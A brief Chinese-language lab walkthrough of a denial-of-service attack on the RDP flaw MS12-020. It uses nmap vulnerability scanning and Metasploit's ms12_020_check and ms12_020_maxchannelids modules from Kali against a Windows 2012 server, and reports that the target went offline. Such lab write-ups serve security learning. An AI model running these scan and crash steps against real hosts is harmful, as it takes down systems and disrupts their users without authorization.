攻击环境:
攻击主机:Kali
受攻击机:Windows 2012 server
0x01 漏洞发现
1)主机端口扫描发现3389端口开放 //--script vulscan为nmap通用的漏洞扫描
nmap --script=vuln -sV [目标ip]
2)证明漏洞存在
使用检查执行:use auxiliary/scanner/rdp/ms12_020_check
设置反弹参数后run
3)攻击前能ping同对方主机
0x02 攻击执行
1)漏洞执行参数设置
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
2)漏洞执行
3) 成功执行后,ping对方主机,无响应。远程连接中断,同时网页无响应。
4)攻击成功